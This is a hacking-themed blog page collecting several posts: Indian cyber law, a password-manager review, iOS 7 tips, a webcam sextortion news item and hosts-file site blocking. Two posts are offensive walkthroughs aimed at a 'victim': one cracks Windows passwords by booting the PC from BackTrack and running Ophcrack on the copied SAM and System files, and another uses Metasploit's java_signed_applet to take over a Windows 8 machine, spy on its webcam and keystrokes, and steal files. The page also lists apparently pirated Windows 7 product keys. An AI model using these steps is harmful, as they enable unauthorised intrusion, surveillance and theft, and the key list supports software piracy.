TRANSLATE

Latest Post

IMPORTANT CYBER LAWS IN INDIA MUST KNOW TO EVERYONE

Written By TAC Team on Monday 24 August 2020 | 03:48

Cyber Laws

Cyber Laws consisting of two words. 1. Cyber & 2. Laws.

The word "cyber" came to prominence with the term "cybernetics", which was coined in 1948 by the American mathematician Norbert Wiener (1894-1964).
Law is a system of rules that are created and enforced through social or governmental institutions to regulate behavior.

Cyber law in India governs the legal issues related to cyberspace, cyberattack & cybercrime. In other words, cyber law is an effort to apply laws designed for the physical world, to the human activity on the Internet. In India, The Information Technology Act, 2000 as amended by The IT (Amendment) Act, 2008 is known as the Cyber Law.

Important cyber laws must know to everyone

Hacking -

Hacking is not explained in the Information Technology Act, 2000. In general, hacking means unlawful attempts to bypass the security mechanisms of a network or information system. Hacking is a punishable offence under Information Technology (Amendment)Act, 2008, Section 43(a) read with the section 66 is applicable and Section 379 and 406 of Indian Penal Code, 1860 are also applicable. Hacking offences are cognizable, compoundable, bailable with permission of the court before which the prosecution of such offense is pending and can be trailed by any magistrate.

Data theft -

Data theft is a rising problem, mainly perpetrated by office workers with the access to technology such as desktops, computers and laptops, proficient in storing digital information such as iPods, flash drives and even digital cameras. Data theft is punishable under Information Technology (Amendment) Act, 2008, Section 43(b) which is read with Section 66 is applicable and under Section 379, 405 and 420 of Indian Penal Code,1860 is also applicable. Data theft offences are cognizable, compoundable, bailable with permission of the court before which the prosecution of such an offense is pending and can be trailed by any magistrate.

Spreading virus -

In most of the situations, viruses can do any kind of damage, the creator intends them to do. The Creator can send the data to the third party and then delete the data from the computer. They can also ruin the system and render it unfeasible without a re-installation of the operating system. Spreading virus is a punishable offence under Information Technology (Amendment) Act, 2008, Section 43(c) and 43(e) read with Section 66 is applicable and under section 268 of Indian Penal Code, 1860 is also applicable. Spreading of virus offences is cognizable, compoundable, bailable with permission of the court before which the prosecution of such offense is pending and can be trailed by any magistrate.

Identity theft -

Identity theft is a kind of fraud or cheating of another individual’s identity in which someone pretends to be someone else by assuming that individual’s identity, typically in order to access the resources or obtain credit and other benefits in that individual’s name. Identity theft is punishable under Information Technology (Amendment) Act, 2008, Section 66-C and Section 419 of Indian Penal Code, 1860 is also applicable. Identity theft offences are cognizable, compoundable, bailable with permission of the court before which the prosecution of such offense is pending and can be trailed by any magistrate.

E-mail spoofing -

E-mail spoofing is an e-mail activity in which the sender addresses and other portions of the e-mail header are changed to appear as though the e-mail initiated from a different source. E-mail spoofing is sending an e-mail to another individual in such a way that it appears that the e-mail was sent by another individual. Email spoof is punishable under Information Technology (Amendment) Act, 2008, Section 66-D and Section 417, 419 and 465 of Indian Penal Code, 1860 is also applicable. Email spoofing offences are cognizable, compoundable, bailable with permission of the court before which the prosecution of such offense is pending and can be trailed by any magistrate.

THIS APP CAN MANAGE ALL YOUR PASSWORDS

Written By TAC Team on Tuesday 22 October 2013 | 10:37



We all know that we need to use strong passwords on websites. In fact, a different password for every site you frequent is wise.

Good Web security hygiene creates two problems, however. First, you have to remember all those different passwords. Second, if you lose your smartphone, your many passwords may be at risk.

But there are various password manager apps meant to solve those problems. The best-known password manager app is "1Password" by AgileBits. This app keeps your many Web site passwords, for your bank and so on, safely locked up. It also can keep track of other data like passport details, addresses and more.

The app has a plain yet attractive interface that makes using it a breeze, because its various icons and controls are obvious at one glance.

Tapping the “+” icon brings up a menu that offers you many data categories , like bank account numbers, e- mail details and wireless router passwords . You simply select the appropriate category and enter as much data in the boxes on the next page as you prefer. All your entries are then listed in the main app, and you can group them into folders if you want to keep work and home data separate.

1Password also has a secure browser built into it. It allows you to surf to your bank’s Web site, in one typical case, where it will automatically enter your passwords for you or enter credit card details into shopping sites.

If you think your passwords are too weak, 1Password has an automatic strong password generator that will randomly put together a complex password for you. These may be harder to remember than your usual passwords but, of course, the app remembers them for you.

This app excels in security. There’s a master password that protects your data, and data stored inside the app is encrypted — which makes it safe even if someone steals your device. Its main downside is the price: It’s $18 on iOS. There is a free Android version, but it’s much simpler and you can’t enter new data.

To Download 1Password: Click Here


Original Source: TimesOfIndia

IOS 7 FEW TRICKS - NEW USERS SHOULD KNOW

Written By TAC Team on Thursday 10 October 2013 | 09:54

At long last, iOS 7 has arrived. That is, it arrived for everyone who didn’t say “Developer? Oh, yeah, I’m totally a developer. Cough” and wiggle into the Beta months ago.

iOS 7 is a strange new land, especially on day one. Out with the gradients, in with the trippy fluorescents. Your favorite app? It probably looks completely different now.

It can be confusing, but we’re here to help. iOS 7 has all sorts of nifty little tricks tucked away in places that are in no way immediately obvious, especially if you haven’t followed Tim Cook’s every word along the way.

If you’ve been using iOS 7 for a while, you might know some of these. Hell, you might know most of these. But we tried to cover the bases to make sure that most people learn a thing or two. (Know all of these? You’re way cool, high five. Share another trick down in the comments!)



Swipe Down For Search:




Gone are the days of having to swipe or tap your way to iOS’ dedicated search page. You can now access Spotlight search from anywhere on the homescreen. Just swipe down in the middle of the screen.

You can use Spotlight to quickly search across your device’s apps, emails, and contacts — but curiously, it seems that Apple has removed Spotlight’s ability to search the web. I’m pretty sure I never actually used that, but this is the Internet so I’m supposed to complain now that it’s gone.











Swipe Up For Toggles:

Toggles! At last!

Fixing what is perhaps one of iOS’ most glaring, long-lasting omissions, iOS 7 puts one-click access to things like Airplane mode and Wi-Fi/Bluetooth toggles just one swipe away, instead of hiding them in settings.

To get to the new Control Panel, just swipe up from the bottom of the screen anywhere you might be. You’ll get buttons for Airplane mode, Wi-Fi, Bluetooth, Do Not Disturb, Orientation lock, and sliders for brightness and media control. Oh, and there’s a flashlight in there. So if you were thinking about building a dedicated flashlight app, now is probably not a good time.

(Pro tip: The control panel is available from the lockscreen. Also: if the control panel is sliding out and interrupting your Candy Crushin’ time, you can block it from sliding out while in an app in your settings.)


Reveal iMessage and SMS Timestamps:

iOS has always been kind of weird about telling you when a message was sent or received. It’ll tell you when some messages came through — but only if it’s the first one that’s come through in a while in a given thread. If you sent a bunch of messages around 12:45, for example, you’d normally only get that first 12:45 timestamp.

With iOS 7, you can reveal the timestamp for each and every message. Just grab one of the speech bubbles in a thread and swipe to the left. Tada! Timestamps! Never argue about exactlywhen a message was sent again! (Because, yeah, I’ve had those arguments. Seriously. Sigh.)






Built-In Level:

Building a house boat? Hanging a picture? Just want to show off one of the stranger new tricks that your iPhone has picked up?

iOS 7 has a built-in bubble level, of all things. I thought it was a pretty strange addition at first… but then I found myself using it one day. Then again the next.

To get to the level, open the compass app. Though not immediately obvious, there’s a second page to the app; swipe to the left, and you’ll be at Apple’s level.

(Pro tip: Double-tapping the screen resets the level to consider whatever angle the phone is currently at to be 0°. That design choice, expressed through a series of colored flashes, isn’t super intuitive.)



Swipe To Close Safari Tabs:

Safari has a new, scrolling 3D tab interface that allows for just about as many tabs as you want.

Alas, these tabs also have new, tiny “X” buttons that make closing them quickly a bit of a pain.

Forget the X button — it’s for chumps. Swipe the tabs away to the left, instead. It’s a whole lot faster, and requires less precision when you’re trying to dump a bunch of tabs on the go.









Call/SMS/Facetime Blocking:

“Surely, there’s got to be a way to block phone numbers,” said every iPhone user ever.

Really, just type “How to b” into Google and let it autocomplete. First result? “How to block a number.” Second result? “How to block a number on iPhone.” Third result? “How to be happy.” This feature is in greater demand than happiness! Happiness!

Yet, until now, there hasn’t really been an easy way.

With iOS 7, it’s finally a pretty straightforward process to block people from calling, messaging, or FaceTime-ing (FaceTiming? Facing? Agh.) you. You can find the block list at either Settings > Phone > Blocked; Settings > Messages > Blocked; or Settings > FaceTime > Blocked. Note, however, that the block list is universal — block them in the phone settings, and they’re blocked on FaceTime, too.


App-By-App Cell Data Usage/Blockage:

Want to see which app is using up all of your cell plan’s precious megabytes? Want to keep Pandora from streaming unless it’s on Wi-Fi?

Pop into Settings > Cellular and scroll down to the bottom. You can see which apps have used the most cell data and block any app from using cell data at all. (Note: An app needs to have used cell data at least once for it to show up in the list.)










How To Close Apps:

We’ve had a bunch of requests for this one since this post first went up, so here you go.

Apple changed the App Switching/App Closing mechanism up a bit with iOS 7. It used to be that to close an app, you’d double tap the home button, wait for the app drawer to slide out, then press and hold on an icon until the little “X” appeared.

With iOS 7, the whole thing looks and works a bit more like webOS of yesteryear. Double tap the home button to bring up the fullscreen app switcher, which provides a screenshot of each running application in a sideways-scrolling carousel. To close an application, simply swipe the app’s screenshot up and off the screen.

(Note: You really shouldn’t need to close apps all that often. Unless the app has crashed and refuses to fix itself or it’s doing something that is eating your battery, iOS 7 is designed so that most apps use little to no resources when in the background.)


Bonus Tricks:

  • Folders can now be paged, allowing them to hold a huge number of apps.
  • Safari still has private-browsing mode, it’s just in the app itself now instead of hidden away in settings. Find the switch in Safari’s tabs screen.
  • Airdrop, Apple’s much touted system for wirelessly transferring files to other nearby iPhones, only works with the iPhone 5 and later. (I’ve spotted many a 4S user wasting time trying to figure out how the heck to turn it on, when the option simply isn’t there for them. Don’t worry, I wasted a good 10 minutes myself.)
  • Miss the “List” view in the calendar app? It’s still there, just not immediately obvious. Tap the search icon to bring up a scrollable list.
  • If you’re into using default ringtones, give Apple’s list another look. They’ve added a bunch of new trancy ringtones and chiptuney text alerts.
  • Siri has picked up a bunch of new tricks. You can toggle settings (“Turn On Do Not Disturb”), ask for recent tweets (“What is TechCrunch saying?”), show you pictures (“Show me pictures of cats”) pulled from Bing, provide Wikipedia info inline (“Tell me about TechCrunch”), post to Facebook, play back voicemail, list recently missed calls, and find restaurants on Yelp and make OpenTable reservations.
  • iOS 7 keeps tabs on where you hang out most, allowing it to cache relevant nearby data. It’s neat, if a bit spooky. Once you’ve used iOS 7 for a while, go to Settings > Privacy > Location Services > System Services to view a list of your frequent haunts. You can also turn this feature off at the same location.
Know any other tricks that we should list? (“LOL SWITCH TO ANDROID” doesn’t count.) Drop a comment and we’ll add the best.

viaTechCrunch

HOW TO CRACK WINDOWS PASSWORD IN 5 MINUTES?

Written By TAC Team on Friday 27 September 2013 | 08:06

Hi Friends,



Here, we'll learn How to Crack Windows (xp, vista, 7, 8) Passwords With Backtrack. Using OphCrack.


Using Ophcrack, You can crack account password of almost all the Windows till date, And since OphCrack is the fastest password cracking tool, it wont take more than 4-5 minutes to crack a password.

So let's begin -
What Do You Need ?

>
BackTrack 5 Live DVD.
> Rainbow Files (i'll tell you what it is.)
> Physical Access to victim PC.


So What-The-Hell is Rainbow Files ?

First thing that pops in mind when reading rainbow files is the collection of rainbows and unicorns flying, but no, Rainbow Files/Tables are basically huge sets of precomputed tables filled with hash values that are pre-matched to possible plain text passwords. The Rainbow Tables essentially allow hackers to reverse the hashing function to determine what the plain text password might be. It's possible for two different passwords to result in the same hash so it's not important to find out what the original password was, just as long as it has the same hash. The plain text password may not even be the same password that was created by the user, but as long as the hash is matched, then it doesn't matter what the original password was.


So What Do I Need To Do ?
You need to download the rainbow tables matching to the OS Version of your victim PC, Get Them Here. You can download the smaller files because they will work, unless your victim is the Head of FBI who uses 28 letter long password.

NOTE : the vista files will work for Windows 7 and Windows 8 too.


Everything is Downloaded and ready,Now -
Put the downloaded rainbow tables in a flash drive,and pick that BackTack 5 Live DVD too.


Let The Hack Begin -
Step 1 -
Boot the Victim PC with BackTrack Live DVD.
Step 2 -
Now Navigate To The Directory where windows password files are Stored.
WINDOWS/system32/config/
Step 3 -
Locate the Files "SAM" and "System",and copy them to a new folder on BackTrack desktop.
Step 4 -
Run The OphCrack tool in backtrack by : 
Start->Backtrack->Privilege Escalation->Password Attack->Offline Attacks-OphCrack GUI.
Step 5 -
Go to "Load" and select "Encrypted SAM" in ophcrack tool. Now it will ask you to select directory that contains SAM folder. Select the directory where you saved the SAM file (new folder on desktop).
Step 6 -
Target The Administrator Account, remove other account off the list (if any).
Step 7 -
Plug in the pen-drive/flash drive, Extract The Rainbow Tables to Desktop.
Step 8 -
Click on the Table button in ophcrack tool. Now it will ask you to select the table. Select the files as required. Click OK after that.
Step 9 -
Now Hit the Crack Button, and wait for 3-4 minutes, You will have the key in your hands .

WHY YOUR ENCRYPTION/PASSWORDS SUCK? NEW SECURITY METHODS : 3D FACE ANALYSIS, BIO METRICS, & MORE.

Thousands of Online Services uses Password, Be it Banks, Shops, Social Networking Sites, Email's And Every other service. These Passwords are lying on the Databases of the companies, Which frequently have very basic security.
And These sites Do Get Hacked.




" Treat Your Passwords Like you treat your Toothbrush, Don't Let anyone Use it and Change it every 6 Months "

  - Clifford Stoll, Scientist.

Here Are Some Of The Greatest Attacks :

Service                                : Victims
Sony PlayStation Network       : 77 Million Accounts Hacked. Site Down For 24 Days.
Evernote                                  : 50 Million Accounts Hacked, Including Addresses.
LinkedIn                                  : 6.5 Million Accounts Hacked.
Gamigo                                    : 8.24 Million Accounts Exploited.
Yahoo Voices                          : 450,000 Accounts Hacked.
Twitter                                     : 250,000 Accounts Hacked.


Most Of the Accounts Get Hacked Because the Main Site Server Gets Exploited, But Many Individual Accounts Get Hacked Because people are too damn dumb to use complex password, A Survey done by Mark Burnett for 12 years Indicates that 78% of online users use These passwords :

password, 2000, hockey, dallas, 
123456, jordan, george, yankees,
1234, superman, charlie, 123123,
12345678, harley, andrew, ashley,
qwerty, 1234567, michelle, 666666,
dragon, fuck, love, hello,
sex, asshole, jessica, amanda,
12345, hunter, boobs, orange,
baseball, trustno1, legend-ary, biteme,
football, ranger, 6969, freedom,
letmein, buster, pepper, computer,
monkey, thomas, daniel, fuckme,
696969, tiger, access, nicole,
abc123, robert, 123456789, thunder,
mustang, soccer, 654321, ginger,
micheal, porn, joshua, heather,
shadow, batman, maggie, hammer,
master, test, starwars, summer,
wintwe, jennifer, pass, silver,
fucking, carlover, killer, william,



What And How Hackers Do What They Do !

I Don't Know How, But somebody tricked us into thinking Hackers are Geeks on Laptops ( which we are) but you should also remember that Hackers have great observation skills. Hackers Follow you everywhere, Once they lay their eyes on a target, they dig out every bit of information available about you. They spy on your online photos, They know your cat's name, Your Car's Model and everything you might have mentioned in online world.
Hackers Can attack you on many fronts, like : Cracking your Social networking website password, Stealing Data from your personal computer, Phishing you or even using your E-Mail ID to send messages to terrorists.


Methods To Confuse And Avoid Hackers :


Two Factor Authentication :Many E-mail Providers use Two Factor Authentication like Gmail, Yahoo and Facebook, And it the strongest method to protect yourself from getting hacked. To access your account, First you have to sign in Using your E-mail and Password, And then An Eight Digit Code is sent to your mobile within a few seconds, Which you have to fill online to get access to your account.


Pros :
> Strongest Security Method.
> You know when your account is being accessed.
> Alert On Your Mobile if someone tries to brute-force your account.


Cons :
> Not so Time Efficient.
> You Need Your Mobile And Good Signal Reception.


Total Rating :


Security :


Comfort :



OPENID :
A Universally Usable ID Is given to you if you use OPENID. UUID are mostly URL specially crafted for you. To Log In into any service, You'll have to just insert your OpenId, Not your password. Using OpenID is also a good Idea as password have a habit of getting hacked. OpenID is usable on Google, Yahoo, LiveJournal, Hyves, Blogger, Flickr And other sites.

Pros :
> One-For-All Username and Password.
> Saves Time.


Cons :
> Not So-Many Sites Supported.

Total Rating :


Security :



Comfort :




Swipe Gestures :
Swipe gestures are a popular way to lock your Android Phones, And they very Are Simple to use, Thus easily crack-able. Anybody can remember your Swipe by seeing it first time, Also Somebody can find out your swipe by observing the scratches on the surface of your screen.


Pros :
> Easy And Simple.


Cons :
> Easily Hack-able.

Total Rating :


Security :



Comfort :




Password Stick :
On Many Operating Systems, You Can create a password stick which can unlock your computer by plugging it in. It is a time saving and secure method, Unless Your hacker is also good at picking pockets.We are not very fond of this method, as your brain is the safest place to store sensitive information.


Pros :
> Time Saving.
> Easy.
> Secure.


Cons :
> Danger Of Getting Hacked if stick is stolen.

Total Rating :


Security :


Comfort :




Finger Print Scan :
One of the oldest method of securing, Finger print scanners are widely available on Laptops, Netbooks, External USB Scanner etc. Also a rumor has it that the new iPhone Might have a Fingerprint scanner in the home button. It is a good and secure way to protect your data.


Pros :
> Easy To Use.
> Widely Available.


Cons :
> Remember to clear the scanner after each scan or the print left on the scanner can be easily used by hacker.



Total Rating :

Security :


Comfort :



3D Face Analysis :
On Mobile Since Android 4.0, 3D Face Scan is an awkward way to unlock your mobile, It uses your mobile/laptop camera to take a video of your whole face each time to unlock your device. But we don't think this type of security method is useful in Mobiles, Tough it is very useful in PC Security and Other stuff that you don't need to unlock every other second.


Pros :
> Very Secure.
> Very Difficult To Hack.


Cons :
> Good Lightning needed.
> Can be cracked by a video of your's.

Total Rating :

Security :



Comfort :




Behavior Pattern :
Everybody has different way of interacting with technology, And the Swedish Firm BehavioSac Has used it to create a newsecurity system. In this method, You Need to enter your password and have to do it in the same way you did before. Other Factors Include : Typing Rhythm, Speed, And on touchscreen Devices : Angle of gestures, pressure of angles and other stuff !


Pros :
> Highly Secure.
> Easy To Use.


Cons :
> Not available on the market Yet.
> Could be a pain in the ass when you're drunk or sleepy.

Total Rating :

Security :


Comfort :




Conclusion :
With the increasing security risk, It Would be a good idea if the services we use everyday would get a security upgrade, And If the users follow some basic security tips, It would make them much more secure in the online world.


HACK WINDOWS 8 USING KALI LINUX BACKTRACK 6 METASPLOIT


So As you have heard, about the New version of Backtrack, Dubbed as Kali Linux.
This edition brought many changes in the Backtrack OS, If you want to download, Click Here.
 
Now, we start Kali Linux Tutorial, using our favourite tool "Metasploit". we will now create a Java Signed Applet, which will enable us to control the victims PC, use his webcam, see whats on his screen, tap their key strokes and much more.
So Let's Begin :
What Do You Need For This Attack :
# Kali Linux "Backtrack 6" : Get It Here.
# Metasploit On it . (tutorial below)
# A Victim using Windows 8.
# Brains And Balls !

KALI Linux And Metasploit :
Kali Linux, This evolved version of our lovely Backtrack, Is a Linux Distro Specially Created for Hackers, By Hackers. You will find 1000+ Tools in it which are capable of SQL Injection, IP Smurfing, IP Scanning, Password Cracking And more. It is based on Debian, Which is known as the most tested and most solid base for any Operating systems. It Has a very big software library and it is pretty easy to Use.
BEST THING :Its Open Source.

Metasploit is a security penetration tool, Based on Metasploit framework. Metasploit was buggy-as-hell in backtrack, but i'm happy to tell you it has completely changed its libraries and is now smooth as silk on Kali.
Steps To Perform This Attack :

#1 - Launching Metasploit On Kali Linux :
So I Assume you have Kali Linux running on your PC, doesn't matter if its on a Live CD, USB, Or Installed. 
(If you don't know how to install Kali Linux, Click Here)



So Now you need to open the terminal and type this :


msfconsole


Give it a sec, and after it has loaded, type (or copy/paste) this command :


use multi/browser/java_signed_applet


It would look something like this picture below :


#2 - Setting Port Numbers :
So you know we need an active port on both victim pc and our computer, so that our computers can talk to each other. In this version, this port is called SRVPORT, and we can set it by :


set SRVPORT [Port number]


it is by default 8080, but i have set it to 1020, you can set it to anything you want.


Now to change the path to the exploit, we can set the URIPATH to anything we want. We can leave all the settings as it is, but it will look a little bit ugly, And ugly is bad for hackers, we want our thing to look like a diamond, so that everybody wants it. So to do it we will type this command now :


set URIPATH /


#3 - Verifying if it is done correctly :
You don't want any errors, trust me, so why don't you look at all the command you have typed.


#4 - Launching the exploit :
After checking everything, we will type this command and this will launch our exploit :


exploit


now all you have to do is send the IP to the victim, and get one click on it, andddddddd..................., you have hacked his PC.


Of-course he will see a warning like this :


but you can get past it, can't you guys .


#5 - Welcome To His System :
Now you have opened a meterpreter to the victims PC, and if you search Google for some powerful commands, you can erase/delete/corrupt/shut down/reboot/steal his files/passwords etc . So use it carefully.


#6 - If you think this is useful please share or like our site link with your friends......


MISS TEEN USA 2013 SAYS SEXTORTIONIST HACKED WEBCAM TO SNAP BEDROOM PHOTOS


Newly crowned Miss Teen USA Cassidy Wolf is allegedly the latest victim of sextortion.

According to the LA Times, the Federal Bureau of Investigation (FBI) confirmed on Wednesday that it's investigating claims by Wolf and other women who say that their webcams were hacked, photos or video were taken surreptitiously, and that the hacker or hackers then demanded money in exchange for keeping the photos out of public disclosure.

Wolf, of Orange County, California, was Miss California Teen USA before winning the Miss Teen USA pageant over the weekend at the Atlantis Hotel in the Bahamas.

19-year-old Ms. Wolf has told reporters that prior to being crowned, she received an anonymous email from someone who claimed to have nude photos of her, taken via the webcam on her computer.

Wolf told Today News that about four months ago, Facebook notified her about somebody trying to log into her account from another state.

She then received an email saying that the person had photos of her taken in her bedroom via her computer's hacked webcam. The person, who hasn't been named in the ongoing federal investigation, tried to extort her in exchange for keeping the photos from being made public.

As if everyday webcam hacking weren't shocking enough, this case apparently involves a webcam that was hacked without the telltale camera light coming on to indicate that it was recording.

This is how Ms Wolf tells it:


"I wasn't aware that somebody was watching me [on my webcam]. The [camera] light didn't even go on, so I had no idea."

Is that possible? Can webcams be rigged so as to record without the light coming on?

Sophos Senior Security Advisor Chester Wisniewski has looked at the issue, and he says it depends:


"Some laptops allow you to turn the light on and off in software, others only work physically. I think it is certainly possible, if unlikely."

But if it's unlikely to suffer a webcam hacking that manages to turn off the camera's "on" light, plain old vanilla webcam hacking that leaves the light on isn't very unlikely at all.

In fact, as the BBC reported in June, there's a thriving black market for access to computers whose webcams have been compromised.

Stolen webcam video of females cost $1 per "slave," as they're called. Stolen video of male slaves goes for $1/100 slaves.

As for Ms. Wolf, she has turned her alleged victimization into a crusade. Today News reports that after she was named Miss California, she traveled to schools to raise awareness about cybercrime among teens.

Her advice to teens is to routinely clear their browsing history and change their password into something difficult to guess.

She's quoted by International Business Times on password hygiene:


"I had the same password for years. But now seeing that someone can hack into my stuff just by downloading an incorrect link, it's very important to change your passwords, delete your cookies."

Having a safe password is absolutely the right way to go. Here's one way to create one.

I would also suggest to Ms. Wolf that if she's not telling teens this already, to please urge them against using the same password on multiple sites.

And since multiple hard-to-crack passwords can be tough to wrangle, Ms. Wolf also might want to suggest the use of a password manager, such as KeePass, 1Password or LastPass.

When we report on webcam spying at Naked Security, we typically tell users to keep an eye on the light. That, evidently, won't stop remote hackers of webcams who manage to turn off the camera light via accessing its software.

But given that, as Chet notes, such a hack is unlikely, it's still a good idea to keep an eye on the light. Better still, cover it with a patch - a tiny piece of black tape, say, or a sticker or bandage - when you're not using the camera.

Ms. Wolf, for her part, has said that she's prepared for another attack by putting a sticker over her webcam when it's not in use.

Nice going on your cybercrime defense education work, Ms. Wolf, and best of luck with your continued studies, be it with your beloved jazz dancing or the hair-raising world of cybercrime.

viaNakedSecurity

WINDOWS 7 ULTIMATE SERIAL NUMBERS, WINDOWS 7 32 BIT SERIAL KEY FREE, WINDOWS 7 GENUINE


7YWX9-W3C2V-D46GW-P722P-9CP4D

MM7DF-G8XWM-J2VRG-4M3C4-GR27X 

KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8 

MVBCQ-B3VPW-CT369-VM9TB-YFGBP 

KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ 

BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR 

RGQ3V-MCMTC-6HP8R-98CDK-VP3FM 

Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3 

6JQ32-Y9CGY-3Y986-HDQKT-BPFPG 

P72QK-2Y3B8-YDHDV-29DQB-QKWWM 

6F4BB-YCB3T-WK763-3P6YJ-BVH24 

9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC 

C43GM-DWWV8-V6MGY-G834Y-Y8QH3 

GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9 

MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7 

MVYTY-QP8R7-6G6WG-87MGT-CRH2P

GRY6B-TJ49J-X73JG-38H9K-VWJHY 

C8XXQ-PQDD6-6KGP6-J8XT6-XGB2X 

                                 8XRH7-RTC6B-BJ42C-C2Q8Y-BRXMG 

                                PTTCH-H7J6M-4XXWH-86RT3-66P6M

                                DLMKZ-2ILHP-7IUG9-A2QVK-A2BYX

                              BPVVG-7KVMM-HGRZ1-SQZ4L-USRHM

                               FJGCP-4DFJD-GJY49-VJBQ7-HYRR2


                           3YHKG-DVQ27-RYRBX-JMPVM-WG38T

                           MVBCQ-B3VPW-CT369-VM9TB-YFGBP


Windows 7 Ultimate Serial Keys

windows 7 ulimate - lenovo - 22TKD-F8XX6-YG69F-9M66D-PMJBM

windows 7 ulimate - dell - 342DG-6YJR8-X92GV-V7DCV-P4K27

windows 7 ulimate - acer - FJGCP-4DFJD-GJY49-VJBQ7-HYRR2



Windows 7 Professional Serial Keys

windows 7 professional - dell - 32KD2-K9CTF-M3DJT-4J3WC-733WD

windows 7 professional - acer - YKHFT-KW986-GK4PY-FDWYH-7TP9F

windows 7 professional - hp - 74T2M-DKDBC-788W3-H689G-6P6GT

windows 7 professional - samsung - GMJQF-JC7VC-76HMH-M4RKY-V4HX6



Windows 7 Home Premium Serial Keys

windows 7 Home Premium - samsung - CQBVJ-9J697-PWB9R-4K7W4-2BT4J

windows 7 Home Premium - packard bell - VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7

windows 7 Home Premium - dell - 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82

windows 7 Home Premium - asus - 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG



Windows 7 Beta 64-bit Product Key 

7XRCQ-RPY28-YY9P8-R6HD8-84GH3

JYDV8-H8VXG-74RPT-6BJPB-X42V4

482XP-6J9WR-4JXT3-VBPP6-FQF4M

JYDV8-H8VXG-74RPT-6BJPB-X42V4

~~~~~~~~~~~~~~~~~~~~~~~~~~

Windows 7 Beta 32-bit Product Key

6JKV2-QPB8H-RQ893-FW7TM-PBJ73

TQ32R-WFBDM-GFHD2-QGVMH-3P9GC

GG4MQ-MGK72-HVXFW-KHCRF-KW6KY

4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH

QXV7B-K78W2-QGPR6-9FWH9-KGMM7

PLEASE NOTE THAT WE DONT TAKE THE REPONSIBILITY OF ANY KEYS WHETHER THEY ARE WORKING OR NOT, THESE ARE JUST COLLECTED KEYS......

WHICH WE HAVE POSTED FOR YOU, MAY BE IT WILL BE HELPFUL....... ENJOY.... ::)



"REMEMBER IF U GET THIS IS HELPFUL, PLEASE MAKE A LIKE / SHARE WITH YOUR FRIENDS.... THANK YOU!"

BLOCKING OR UNBLOCKING FACEBOOK OR ANY OTHER WEBSITES ON YOUR COMPUTER

Written By TAC Team on Friday 20 September 2013 | 09:08


I had previously posted about Blocking And Unblocking any websites on your computer. In this tutorial i will teach you to specifically block facebook on your computer. This might be helpfull if you want to prevent students from using facebook in school and colleges or your employees in office. If you are parent and don't want you child to use facebook or any other particular site then follow simple steps given below. So lets get started.

How To Block Facebook ?

1. Go to Start > Programmes > Accesories
2. Then Right click on Notepad and Run it as administrator.
3. Now open host file by clicking on File > Open and locate to following address

C:\WINDOWS\system32\drivers\etc

4. Then just below # 127.0.0.1 localhost paste folowing code

# Blocking Facebook                                
127.0.0.1 login.facebook.com               
127.0.0.1 www.facebook.com               
127.0.0.1 apps.facebook.com               
127.0.0.1 blog.facebook.com                

5. Now save the host file and done.
6. Open any browser and try to open facebook. It won't open. If facebook opens then you might have done somthing wrong. (let me know if you face any problem)


Blocking Other Website

If you want to block website other then facebook then change facebook address with whatever website you want to block. For example: to block google paste following code below 
# 127.0.0.1 localhost                               

 # block google                                        
127.0.0.1 www.google.com               


BLOCK FACEBOOK ON YOUR COMPUTER IN SIMPLE STEPS



I had previously posted about Blocking Facebook on your computer but many users were facing difficulties doing that. So In this tutorial i will share with you guys an amazing programme or small little tool that will allow you block facebook on your computer easily in just few simple steps. So lets get started

How To Use Facebook Blocker ?

1. First download Facebook Blocker by Clicking Here

2. Extract the file and right click on Facebook Blocker.exe and run it as administator(Important)

3. Press 1 in order to backup your host file to be on the safe side.



4. Now Press 2 to block facebook

5. Its time to check if facebook is blocked or not to do that Press 5

6. Hope this help you if you have any question leave a comment below.

Popular Posts